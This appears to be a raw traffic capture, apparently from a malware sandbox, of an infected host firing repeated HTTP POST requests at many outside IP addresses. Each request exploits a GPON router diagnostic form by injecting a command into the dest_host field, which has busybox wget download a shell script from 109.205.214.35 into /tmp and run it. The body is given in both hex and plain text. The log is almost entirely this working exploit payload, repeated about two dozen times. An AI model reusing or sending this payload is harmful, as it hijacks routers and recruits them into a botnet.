                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1815192.168.2.1336830212.170.165.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820622921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1816192.168.2.1334606118.169.45.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820641041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1817192.168.2.1352906118.120.158.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820691109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1818192.168.2.1349278118.215.101.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820707083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1819192.168.2.1348976109.80.11.64443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820730925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1820192.168.2.133497242.181.194.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820754051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1821192.168.2.135771442.59.10.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820765018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1822192.168.2.134075242.210.96.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820816040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1823192.168.2.1333172118.233.214.240443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820842028 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1824192.168.2.13527125.83.76.86443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820877075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1825192.168.2.1335374109.109.130.72443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820894957 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1826192.168.2.133989242.177.130.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820905924 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1827192.168.2.13605785.122.84.246443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820921898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1828192.168.2.1360860118.6.165.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820957899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1829192.168.2.133868242.37.207.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821012974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1830192.168.2.134751042.202.103.194443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821058989 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1831192.168.2.1357700212.32.12.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821060896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1832192.168.2.1354166118.87.202.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821083069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1833192.168.2.134974442.147.229.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821110010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1834192.168.2.13496725.82.168.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821152925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1835192.168.2.134516242.55.108.225443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821192026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1836192.168.2.1335922118.162.18.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821197033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1837192.168.2.1357416212.252.164.134443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821228981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
